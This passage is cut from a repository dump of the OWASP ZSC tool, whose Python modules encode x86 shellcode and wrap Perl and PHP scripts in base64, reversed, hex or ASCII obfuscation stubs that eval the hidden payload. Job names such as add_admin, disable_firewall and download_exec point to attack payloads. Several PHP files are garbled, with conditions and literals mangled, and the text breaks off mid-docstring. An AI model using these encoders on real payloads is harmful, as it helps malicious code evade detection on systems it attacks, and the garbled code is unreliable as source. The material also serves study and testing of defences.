$0x%s\npop 
%%ebx\n%s\npush %%ebx\n' % ( 47 | str(ebx_2), inc) 48 | shellcode = shellcode.replace(line, command) 49 | shellcode = shellcode.replace('_z3r0d4y_', '') 50 | 51 | if "system" == job: 52 | for line in shellcode.rsplit('\n'): 53 | if 'push' in line and '$0x' in line and ',' not in line and len( 54 | line) > 14: 55 | ebx_2 = line.rsplit('push')[1].rsplit('$0x')[1] 56 | n = 0 57 | while n < times: 58 | ebx_2 = "%x" % (int(ebx_2, 16) - int('01', 16)) 59 | n += 1 60 | inc = 'inc %eax\n' * n 61 | command = '\npush $0x%s\npop %%eax\n%spush %%eax\n' % ( 62 | str(ebx_2), str(inc)) 63 | shellcode = shellcode.replace(line, command) 64 | 65 | 66 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/sub_random.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random, binascii, string 10 | from core.compatible import version 11 | _version = version() 12 | chars = string.digits + string.ascii_letters 13 | 14 | 15 | def start(shellcode, job): 16 | 17 | if job == "exec": 18 | t = True 19 | eax = str('0x3b') 20 | while t: 21 | if _version is 2: 22 | eax_1 = binascii.b2a_hex(''.join(random.choice(chars) 23 | for i in range(1))) 24 | if _version is 3: 25 | eax_1 = (binascii.b2a_hex((''.join(random.choice( 26 | chars) for i in range(1))).encode('latin-1')) 27 | ).decode('latin-1') 28 | eax_1 = str('0') + str(eax_1[1]) 29 | eax_2 = "%x" % (int(eax, 16) + int(eax_1, 16)) 30 | if eax > eax_1: 31 | if '00' not in str(eax_1) and '00' not in str(eax_2): 32 | t = False 33 | 34 | A = 0 35 | eax = 'push $%s' % (str(eax)) 36 | if '-' in eax_2: 37 | A = 1 38 | eax_2 = eax_2.replace('-', '') 39 | eax_sub = 'push 
$0x%s\npop %%eax\nneg %%eax\nsub $0x%s,%%eax\n' % ( 40 | eax_2, eax_1) 41 | 42 | if A is 0: 43 | eax_sub = 'push $0x%s\npop %%eax\nsub $0x%s,%%eax\n' % (eax_2, 44 | eax_1) 45 | shellcode = shellcode.replace('mov $0x3b,%al', eax_sub) 46 | for line in shellcode.rsplit('\n'): 47 | if 'push' in line and '$0x' in line and ',' not in line and len( 48 | line) > 14: 49 | data = line.rsplit('push')[1].rsplit('$0x')[1] 50 | t = True 51 | while t: 52 | if _version is 2: 53 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars) 54 | for i in range(4))) 55 | if _version is 3: 56 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 57 | chars) for i in range(4))).encode('latin-1')) 58 | ).decode('latin-1') 59 | ebx_2 = "%x" % (int(data, 16) + int(ebx_1, 16)) 60 | if str('00') not in str(ebx_1) and str('00') not in str( 61 | ebx_2) and len(ebx_2.replace( 62 | '-', '')) >= 7 and len( 63 | ebx_1) >= 7 and '-' not in ebx_1: 64 | ebx_2 = ebx_2.replace('-', '') 65 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nsub %%ebx,%%eax\npush %%eax\n' % ( 66 | str(ebx_1), str(ebx_2)) 67 | shellcode = shellcode.replace(line, command) 68 | t = False 69 | 70 | if job == "system": 71 | for line in shellcode.rsplit('\n'): 72 | if 'push' in line and '$0x' in line and ',' not in line and len( 73 | line) > 14: 74 | data = line.rsplit('push')[1].rsplit('$0x')[1] 75 | t = True 76 | while t: 77 | if _version is 2: 78 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars) 79 | for i in range(4))) 80 | if _version is 3: 81 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 82 | chars) for i in range(4))).encode('latin-1')) 83 | ).decode('latin-1') 84 | ebx_2 = "%x" % (int(data, 16) + int(ebx_1, 16)) 85 | 86 | if str('00') not in str(ebx_1) and str('00') not in str( 87 | ebx_2) and len(ebx_2) >= 7 and len( 88 | ebx_1) >= 7 and '-' not in ebx_1: 89 | ebx_2 = ebx_2.replace('-', '') 90 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nsub %%ebx,%%eax\npush %%eax\n' % ( 91 | str(ebx_1), 
str(ebx_2)) 92 | shellcode = shellcode.replace(line, command) 93 | t = False 94 | 95 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/sub_yourvalue.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | 11 | def start(type, shellcode, job): 12 | 13 | if job == "exec": 14 | value = str(type.rsplit('sub_')[1][2:]) 15 | t = True 16 | eax = str('0x3b909090') 17 | eax_1 = value 18 | eax_2 = "%x" % (int(eax, 16) + int(eax_1, 16)) 19 | A = 0 20 | eax = 'push $%s' % (str(eax)) 21 | if '-' in eax_2: 22 | A = 1 23 | eax_2 = eax_2.replace('-', '') 24 | eax_sub = 'push $0x%s\npop %%eax\nneg %%eax\nsub $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 25 | eax_2, eax_1) 26 | 27 | if A is 0: 28 | eax_sub = 'push $0x%s\npop %%eax\nsub $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 29 | eax_2, eax_1) 30 | shellcode = shellcode.replace('mov $0x3b,%al', eax_sub) 31 | A = 0 32 | for line in shellcode.rsplit('\n'): 33 | if '_z3r0d4y_' in line: 34 | A = 1 35 | if 'push' in line and '$0x' in line and ',' not in line and len( 36 | line) > 14 and A is 1: 37 | data = line.rsplit('push')[1].rsplit('$0x')[1] 38 | t = True 39 | while t: 40 | ebx_1 = value 41 | ebx_2 = "%x" % (int(data, 16) + int(ebx_1, 16)) 42 | 43 | if str('00') not in str(ebx_1) and str('00') not in str( 44 | ebx_2) and len(ebx_2) >= 7 and len( 45 | ebx_1) >= 7 and '-' not in ebx_1: 46 | ebx_2 = ebx_2.replace('-', '') 47 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nsub %%ebx,%%eax\npush %%eax\n' % ( 48 | str(ebx_1), str(ebx_2)) 49 | shellcode = shellcode.replace(line, command) 50 | t = False 51 | 
shellcode = shellcode.replace('_z3r0d4y_', '') 52 | if job == "system": 53 | value = str(type.rsplit('sub_')[1][2:]) 54 | for line in shellcode.rsplit('\n'): 55 | if 'push' in line and '$0x' in line and ',' not in line and len( 56 | line) > 14: 57 | data = line.rsplit('push')[1].rsplit('$0x')[1] 58 | ebx_1 = value 59 | ebx_2 = "%x" % (int(data, 16) + int(ebx_1, 16)) 60 | A = 0 61 | if str('-') in str(ebx_2): 62 | ebx_2 = ebx_2.replace('-', '') 63 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nsub %%ebx,%%eax\npush %%eax\n' % ( 64 | str(ebx_1), str(ebx_2)) 65 | A = 1 66 | if A is 0: 67 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nsub %%ebx,%%eax\npush %%eax\n' % ( 68 | str(ebx_1), str(ebx_2)) 69 | shellcode = shellcode.replace(line, command) 70 | 71 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/xor_random.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random, binascii, string 10 | from core.compatible import version 11 | _version = version() 12 | chars = string.digits + string.ascii_letters 13 | 14 | 15 | def start(shellcode, job): 16 | if "system" == job: 17 | for line in shellcode.rsplit('\n'): 18 | if 'push' in line and '$0x' in line and ',' not in line and len( 19 | line) > 14: 20 | data = line.rsplit('push')[1].rsplit('$0x')[1] 21 | t = True 22 | while t: 23 | if _version is 2: 24 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars) 25 | for i in range(4))) 26 | if _version is 3: 27 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 28 | chars) for i in range(4))).encode('latin-1')) 29 | ).decode('latin-1') 30 | ebx_2 = "%x" % 
(int(data, 16) ^ int(ebx_1, 16)) 31 | 32 | if str('00') not in str(ebx_1) and str('00') not in str( 33 | ebx_2) and len(ebx_2) >= 7 and len( 34 | ebx_1) >= 7 and '-' not in ebx_1: 35 | ebx_2 = ebx_2.replace('-', '') 36 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nxor %%ebx,%%eax\npush %%eax\n' % ( 37 | str(ebx_1), str(ebx_2)) 38 | shellcode = shellcode.replace(line, command) 39 | t = False 40 | 41 | if "exec" == job: 42 | t = True 43 | eax = str('0x3b') 44 | while t: 45 | if _version is 2: 46 | eax_1 = binascii.b2a_hex(''.join(random.choice(chars) 47 | for i in range(1))) 48 | if _version is 3: 49 | eax_1 = (binascii.b2a_hex((''.join(random.choice( 50 | chars) for i in range(1))).encode('latin-1')) 51 | ).decode('latin-1') 52 | eax_1 = str('0') + str(eax_1[1]) 53 | eax_2 = "%x" % (int(eax, 16) ^ int(eax_1, 16)) 54 | if eax > eax_1: 55 | if '00' not in str(eax_1) and '00' not in str(eax_2): 56 | t = False 57 | 58 | A = 0 59 | eax = 'push $%s' % (str(eax)) 60 | if '-' in eax_2: 61 | A = 1 62 | eax_2 = eax_2.replace('-', '') 63 | eax_xor = 'push $0x%s\npop %%eax\nneg %%eax\nxor $0x%s,%%eax\n' % ( 64 | eax_2, eax_1) 65 | 66 | if A is 0: 67 | eax_xor = 'push $0x%s\npop %%eax\nxor $0x%s,%%eax\n' % (eax_2, 68 | eax_1) 69 | shellcode = shellcode.replace('mov $0x3b,%al', eax_xor) 70 | for line in shellcode.rsplit('\n'): 71 | if 'push' in line and '$0x' in line and ',' not in line and len( 72 | line) > 14: 73 | data = line.rsplit('push')[1].rsplit('$0x')[1] 74 | t = True 75 | while t: 76 | if _version is 2: 77 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars) 78 | for i in range(4))) 79 | if _version is 3: 80 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 81 | chars) for i in range(4))).encode('latin-1')) 82 | ).decode('latin-1') 83 | ebx_2 = "%x" % (int(data, 16) ^ int(ebx_1, 16)) 84 | if str('00') not in str(ebx_1) and str('00') not in str( 85 | ebx_2) and len(ebx_2.replace( 86 | '-', '')) >= 7 and len( 87 | ebx_1) >= 7 and '-' not in ebx_1: 88 | 
ebx_2 = ebx_2.replace('-', '') 89 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nxor %%ebx,%%eax\npush %%eax\n' % ( 90 | str(ebx_1), str(ebx_2)) 91 | shellcode = shellcode.replace(line, command) 92 | t = False 93 | 94 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/osx_x86/xor_yourvalue.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | 11 | def start(type, shellcode, job): 12 | 13 | if "exec" == job: 14 | value = str(type.rsplit('xor_')[1][2:]) 15 | t = True 16 | eax = str('0x3b909090') 17 | eax_1 = value 18 | eax_2 = "%x" % (int(eax, 16) ^ int(eax_1, 16)) 19 | A = 0 20 | eax = 'push $%s' % (str(eax)) 21 | if '-' in eax_2: 22 | A = 1 23 | eax_2 = eax_2.replace('-', '') 24 | eax_xor = 'push $0x%s\npop %%eax\nneg %%eax\nxor $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 25 | eax_2, eax_1) 26 | 27 | if A is 0: 28 | eax_xor = 'push $0x%s\npop %%eax\nxor $0x%s,%%eax\nshr $0x10,%%eax\nshr $0x08,%%eax\n_z3r0d4y_' % ( 29 | eax_2, eax_1) 30 | shellcode = shellcode.replace('mov $0x3b,%al', eax_xor) 31 | A = 0 32 | for line in shellcode.rsplit('\n'): 33 | if '_z3r0d4y_' in line: 34 | A = 1 35 | if 'push' in line and '$0x' in line and ',' not in line and len( 36 | line) > 14 and A is 1: 37 | data = line.rsplit('push')[1].rsplit('$0x')[1] 38 | t = True 39 | while t: 40 | ebx_1 = value 41 | ebx_2 = "%x" % (int(data, 16) ^ int(ebx_1, 16)) 42 | 43 | if str('00') not in str(ebx_1) and str('00') not in str( 44 | ebx_2) and len(ebx_2) >= 7 and len( 45 | ebx_1) >= 7 and '-' not in ebx_1: 46 | ebx_2 = ebx_2.replace('-', '') 47 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop 
%%eax\nxor %%ebx,%%eax\npush %%eax\n' % ( 48 | str(ebx_1), str(ebx_2)) 49 | shellcode = shellcode.replace(line, command) 50 | t = False 51 | shellcode = shellcode.replace('_z3r0d4y_', '') 52 | 53 | if "system" == job: 54 | value = str(type.rsplit('xor_')[1][2:]) 55 | for line in shellcode.rsplit('\n'): 56 | if 'push' in line and '$0x' in line and ',' not in line and len( 57 | line) > 14: 58 | data = line.rsplit('push')[1].rsplit('$0x')[1] 59 | ebx_1 = value 60 | ebx_2 = "%x" % (int(data, 16) ^ int(ebx_1, 16)) 61 | A = 0 62 | if str('-') in str(ebx_2): 63 | ebx_2 = ebx_2.replace('-', '') 64 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nneg %%eax\nxor %%ebx,%%eax\npush %%eax\n' % ( 65 | str(ebx_1), str(ebx_2)) 66 | A = 1 67 | if A is 0: 68 | command = '\npush $0x%s\npop %%ebx\npush $0x%s\npop %%eax\nxor %%ebx,%%eax\npush %%eax\n' % ( 69 | str(ebx_1), str(ebx_2)) 70 | shellcode = shellcode.replace(line, command) 71 | 72 | return shellcode -------------------------------------------------------------------------------- /lib/encoder/perl/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/encoder/perl/base64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible 
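def encode(f):
    """Return a Perl stub that base64-decodes *f* at run time and evals it.

    The input is base64-encoded (newlines removed) and stored in a randomly
    named Perl scalar.  The emitted program imports ``decode_base64`` from
    ``MIME::Base64``, defines a one-argument helper that decodes its argument,
    and passes the helper's result to ``eval``.

    For triage: identifiers are 50 random ASCII letters and change on every
    run; the ``use MIME::Base64`` line, the base64 literal and the trailing
    ``eval`` of a helper call do not.

    Note: on Python 3 the text is encoded as latin-1, so a character above
    U+00FF raises ``UnicodeEncodeError``.
    """
    letters = string.ascii_lowercase + string.ascii_uppercase

    def fresh(prefix=''):
        # 50 random letters behind an optional Perl sigil.
        return prefix + ''.join(random.choice(letters) for _ in range(50))

    payload_var = fresh('$')
    data = ''
    # `==` instead of `is`: identity comparison against an int literal only
    # works through CPython's small-int cache and warns on Python 3.8+.
    if _version == 2:
        encoded = str(binascii.b2a_base64(f)).replace('\n', '')
        data = payload_var + ' = "' + encoded + '";\n'
    if _version == 3:
        encoded = binascii.b2a_base64(
            f.encode('latin-1')).decode('latin-1').replace('\n', '')
        data = payload_var + ' = "' + str(encoded) + '";\n'

    # Remaining names are drawn in the original order.
    var_str = fresh('$')
    var_data = fresh('$')
    func_name = fresh()
    func_argv = fresh('$')

    stub = '''
use MIME::Base64 qw(decode_base64);
%s
sub %s {
    %s = shift;
    %s = decode_base64(%s);
    return %s;
}
%s = %s;
eval %s(%s);
''' % (data, func_name, func_argv, var_str, func_argv, var_str, var_data,
       payload_var, func_name, var_data)
    return stub


def start(content, cli):
    """Return *content* inside a ``=begin``/``=cut`` block, then the stub.

    ``=begin`` and ``=cut`` already present in *content* are prefixed with
    ``#`` before wrapping.  ``cli`` is accepted but not used here.
    """
    quoted = content.replace('=begin', '#=begin').replace('=cut', '#=cut')
    return str('=begin\n' + str(quoted) + '\n=cut' + str(encode(content)) +
               '\n')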
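def encode(f):
    """Return a Perl stub that rebuilds *f* at run time and evals it.

    Each character of ``f`` is written as its decimal code point, joined with
    ``*``.  The emitted Perl defines a helper that splits that string on ``*``
    and appends ``chr()`` of every number, then passes the helper's result to
    ``eval``.  Every Perl identifier is 50 random ASCII letters.

    For triage: the source text never appears literally in the output; what
    stays constant between runs is the long ``digits*digits*...`` literal and
    the trailing ``eval`` of a helper call.
    """
    letters = string.ascii_lowercase + string.ascii_uppercase

    def fresh(prefix=''):
        # 50 random letters behind an optional Perl sigil.
        return prefix + ''.join(random.choice(letters) for _ in range(50))

    # Names are drawn in the same order as before, so a seeded `random`
    # still produces the same output.
    var_name = fresh('$')
    ascii_data = '*'.join(str(ord(ch)) for ch in f)
    data = var_name + ' = "' + ascii_data + '";\n'
    var_str = fresh('$')
    var_data = fresh('$')
    var_ascii = fresh('@')
    var_value = fresh('$')
    func_name = fresh()
    func_argv = fresh('$')

    # `\\*` emits the same Perl regex `/\*/` as before; the bare `\*` was an
    # invalid escape in a non-raw Python literal (SyntaxWarning on 3.12+).
    stub = '''
%s
sub %s {
    %s = shift;
    %s = '';
    %s = split /\\*/, %s;
    foreach my %s (%s) {
        %s .= chr(%s);
    }
    return %s;
}
%s = %s;
eval %s(%s);
''' % (data, func_name, func_argv, var_str, var_ascii, func_argv, var_value,
       var_ascii, var_str, var_value, var_str, var_data, var_name, func_name,
       var_data)
    return stub


def start(content, cli):
    """Return *content* inside a ``=begin``/``=cut`` block, then the stub.

    ``=begin`` and ``=cut`` already present in *content* are prefixed with
    ``#`` before wrapping.  ``cli`` is accepted but not used here.
    """
    quoted = content.replace('=begin', '#=begin').replace('=cut', '#=cut')
    return str('=begin\n' + str(quoted) + '\n=cut' + str(encode(content)) +
               '\n')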
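def encode(f):
    """Return a Perl stub that holds *f* as reversed base64 and evals it.

    The input is base64-encoded, the trailing newline is dropped and the
    string is reversed before being stored in a randomly named Perl scalar.
    The emitted helper applies ``reverse`` and ``decode_base64`` to its
    argument, and the program evals the helper's result.

    For triage: identifiers are random per run; the ``use MIME::Base64``
    line, ``decode_base64(reverse ...)`` and the trailing ``eval`` are fixed.
    """
    letters = string.ascii_lowercase + string.ascii_uppercase

    def fresh(prefix=''):
        # 50 random letters behind an optional Perl sigil.
        return prefix + ''.join(random.choice(letters) for _ in range(50))

    var_name = fresh('$')
    data = ''
    # `==` instead of `is`: identity comparison against an int literal only
    # works through CPython's small-int cache and warns on Python 3.8+.
    if _version == 2:
        # [-2::-1] skips the trailing newline b2a_base64 adds, then reverses.
        rev_data = binascii.b2a_base64(f)[-2::-1]
        data = var_name + ' = "' + rev_data + '";\n'
    if _version == 3:
        rev_data = binascii.b2a_base64(
            f.encode('utf8')).decode('utf8')[-2::-1]
        data = var_name + ' = "' + rev_data + '";\n'

    # Remaining names are drawn in the original order.
    var_str = fresh('$')
    var_data = fresh('$')
    func_name = fresh()
    func_argv = fresh('$')

    stub = '''
use MIME::Base64 qw(decode_base64);
%s
sub %s {
    %s = shift;
    %s = decode_base64(reverse %s);
    return %s;
}
%s = %s;
eval %s(%s);
''' % (data, func_name, func_argv, var_str, func_argv, var_str, var_data,
       var_name, func_name, var_data)
    return stub


def start(content, cli):
    """Return *content* inside a ``=begin``/``=cut`` block, then the stub.

    ``=begin`` and ``=cut`` already present in *content* are prefixed with
    ``#`` before wrapping.  ``cli`` is accepted but not used here.
    """
    quoted = content.replace('=begin', '#=begin').replace('=cut', '#=cut')
    return str('=begin\n' + str(quoted) + '\n=cut' + str(encode(content)) +
               '\n')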
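def encode(f):
    """Return a Perl stub that holds *f* as per-character hex and evals it.

    Iterating ``f`` yields one item per character; each is hex-encoded and
    stored in its own randomly named Perl scalar.  The emitted program
    concatenates those scalars with ``.``, feeds the result to a helper that
    converts every two hex digits back with ``chr(hex(substr(...)))``, and
    evals what the helper returns.

    For triage: the output holds one assignment per input character, so it
    grows linearly with the input; the names are random per run, the helper
    body and the trailing ``eval`` are fixed.
    """
    letters = string.ascii_lowercase + string.ascii_uppercase

    def fresh(prefix=''):
        # 50 random letters behind an optional Perl sigil.
        return prefix + ''.join(random.choice(letters) for _ in range(50))

    hex_chunks = []
    for ch in f:
        # `==` instead of `is`: identity comparison against an int literal
        # only works through CPython's small-int cache.
        if _version == 2:
            hex_chunks.append(str(binascii.b2a_hex(ch)))
        if _version == 3:
            hex_chunks.append(str(binascii.b2a_hex(
                str(ch).encode('latin-1')).decode('latin-1')))

    # One name per chunk, drawn before the other names as in the original.
    chunk_names = [fresh() for _ in hex_chunks]
    data = ''.join('$' + name + ' = "' + str(chunk) + '";\n'
                   for name, chunk in zip(chunk_names, hex_chunks))
    # Perl expression that concatenates every chunk variable.
    joined = '.'.join('$' + name for name in chunk_names)

    var_str = fresh('$')
    var_counter = fresh('$')
    var_data = fresh('$')
    func_name = fresh()
    func_argv = fresh('$')

    stub = '''
%s
sub %s {
    %s = shift;
    for(%s = 0; %s < length %s; %s += 2) {
        %s .= chr(hex(substr(%s,%s,2)));
    }
    return %s;
}
%s = %s;
eval %s(%s);
''' % (data, func_name, func_argv, var_counter, var_counter, func_argv,
       var_counter, var_str, func_argv, var_counter, var_str, var_data,
       joined, func_name, var_data)
    return stub


def start(content, cli):
    """Return *content* inside a ``=begin``/``=cut`` block, then the stub.

    ``=begin`` and ``=cut`` already present in *content* are prefixed with
    ``#`` before wrapping.  ``cli`` is accepted but not used here.
    """
    quoted = content.replace('=begin', '#=begin').replace('=cut', '#=cut')
    return str('=begin\n' + str(quoted) + '\n=cut' + str(encode(content)) +
               '\n')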
def start(content, cli):
    """Return *content* inside a ``=begin``/``=cut`` block, then the stub.

    ``=begin`` and ``=cut`` already present in *content* are prefixed with
    ``#`` before wrapping, and the output of ``encode(content)`` is appended
    after the closing ``=cut``.  ``cli`` is accepted but not used here.
    """
    quoted = content.replace('=begin', '#=begin').replace('=cut', '#=cut')
    header = str('=begin\n') + str(quoted) + str('\n=cut')
    stub = str(encode(content))
    return str(header + stub + str('\n'))
6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/encoder/php/base64.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | import random 11 | import string 12 | from core.compatible import version 13 | from core.alert import * 14 | from core.get_input import _input 15 | _version = version() 16 | 17 | 18 | def encode(f): 19 | val_name = ''.join( 20 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 21 | for i in range(50)) 22 | data = '' 23 | eval = '$' + val_name 24 | if _version is 2: 25 | data = '$' + val_name + ' = "' + str(binascii.b2a_base64(f)).replace( 26 | '\n', '') + '";\n' 27 | 28 | if _version is 3: 29 | data = '$' + val_name + ' = "' + str(binascii.b2a_base64(f.encode( 30 | 'latin-1')).decode('latin-1').replace('\n', '')) + '";\n' 31 | 32 | var_str = '$' + ''.join( 33 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 34 | for i in range(50)) 35 | var_data = '$' + ''.join( 36 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 37 | for i in range(50)) 38 | func_name = ''.join( 39 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 40 | for i in range(50)) 41 | func_argv = '$' + ''.join( 42 | random.choice(string.ascii_lowercase + string.ascii_uppercase) 43 | for i in range(50)) 44 | f = ''' 45 | %s 46 | function %s(%s) { 47 | %s = base64_decode(%s); 48 | return %s; 49 | } 50 | %s = %s; 51 | eval(%s(%s)); 52 | ?>''' % (data, func_name, func_argv, var_str, func_argv, var_str, var_data, 53 | eval, 
func_name, var_data) 54 | return f 55 | 56 | 57 | def start(content,cli): 58 | if '' in content or ' or ', '') 71 | elif answer == 'no' or answer == 'n': 72 | pass 73 | else: 74 | warn('You had to answer with yes or no, We count that as "no"\n') 75 | return str(str('''' % (data, func_name, func_argv, var_str, func_argv, var_str, var_data, 51 | var_name, func_name, var_data) 52 | return f 53 | 54 | 55 | def start(content,cli): 56 | if '' in content or ' or ', '') 69 | elif answer == 'no' or answer == 'n': 70 | pass 71 | else: 72 | warn('You had to answer with yes or no, We count that as "no"\n') 73 | return str(str('''' % (data, func_name, func_argv, var_str, func_argv, var_str, func_name, eval) 51 | return f 52 | 53 | 54 | def start(content,cli): 55 | if '' in content or ' or ', '') 68 | elif answer == 'no' or answer == 'n': 69 | pass 70 | else: 71 | warn('You had to answer with yes or no, We count that as "no"\n') 72 | return str(str('''' % (data, func_name, func_argv, var_str, var_ascii, func_argv, var_ascii, 51 | var_value, var_str, var_value, var_str, var_data, var_name, func_name, 52 | var_data) 53 | return f 54 | 55 | 56 | def start(content,cli): 57 | if '' in content or ' or ', '') 70 | elif answer == 'no' or answer == 'n': 71 | pass 72 | else: 73 | warn('You had to answer with yes or no, We count that as "no"\n') 74 | return str(str('''' % (data, func_name, func_argv, var_counter, var_counter, func_argv, 71 | var_counter, var_str, func_argv, var_counter, var_str, var_data, 72 | eval[:-1], func_name, var_data) 73 | return f 74 | 75 | 76 | def start(content,cli): 77 | if '' in content or ' or ', '') 90 | elif answer == 'no' or answer == 'n': 91 | pass 92 | else: 93 | warn('You had to answer with yes or no, We count that as "no"\n') 94 | return str(str('=0;%s-=2) 51 | %s .= chr(hexdec(strrev(substr(%s,%s,2)))); 52 | return %s; 53 | } 54 | %s = %s; 55 | eval(%s(%s)); 56 | 57 | ?>''' % (data, func_name, func_argv, var_str, var_counter, func_argv, 58 | 
var_counter, var_counter, var_str, func_argv, var_counter, var_str, 59 | var_data, var_name, func_name, var_data) 60 | return f 61 | 62 | 63 | def start(content,cli): 64 | if '' in content or ' or ', '') 77 | elif answer == 'no' or answer == 'n': 78 | pass 79 | else: 80 | warn('You had to answer with yes or no, We count that as "no"\n') 81 | return str(str(' 14: 21 | data = line.rsplit('push')[1].rsplit('$0x')[1] 22 | t = True 23 | while t: 24 | if _version is 2: 25 | ebx_1 = binascii.b2a_hex(''.join(random.choice(chars) 26 | for i in range(4))) 27 | if _version is 3: 28 | ebx_1 = (binascii.b2a_hex((''.join(random.choice( 29 | chars) for i in range(4))).encode('latin-1')) 30 | ).decode('latin-1') 31 | ebx_2 = "%x" % (int(data, 16) - int(ebx_1, 16)) 32 | if str('00') not in str(ebx_1) and str('00') not in str( 33 | ebx_2) and '-' in ebx_2 and len(ebx_2.replace( 34 | '-', '')) >= 7 and len( 35 | ebx_1) > 7 and '-' not in ebx_1: 36 | ebx_2 = ebx_2.replace('-', '') 37 | if job == 'exec' or job == 'add_admin' or job == 'dir_create' or job == 'download_exec': 38 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nneg %%ecx\nadd %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 39 | str(ebx_1), str(ebx_2)) 40 | elif job == 'create_file' or job == 'disable_firewall' or job == 'download_tofile': 41 | command = '\npush %%eax\npush $0x%s\npop %%eax\npush $0x%s\npop %%ecx\nneg %%ecx\nadd %%eax,%%ecx\npop %%eax\npush %%ecx\n' % ( 42 | str(ebx_1), str(ebx_2)) 43 | shellcode = shellcode.replace(line, command) 44 | t = False 45 | return shellcode 46 | -------------------------------------------------------------------------------- /lib/encoder/windows_x86/add_yourvalue.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | 
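def start(type, shellcode, job):
    """Rewrite long immediate pushes as an ``add`` of two constants.

    ``type`` carries the user constant after ``add_``; the two characters
    that follow the prefix are dropped (presumably a ``0x`` -- confirm
    against the caller) and the rest is read as hex.  Every line of
    ``shellcode`` that contains ``push`` and ``$0x``, has no comma and is
    longer than 14 characters is replaced by a sequence that loads the
    constant and ``data - constant`` and adds them; ``job`` selects which
    scratch register the sequence saves and restores.

    Raises:
        ValueError: if the constant or the computed difference contains
            ``00`` or has fewer than 7 hex digits, if the constant is
            negative, or if ``job`` is not a known job name.  The original
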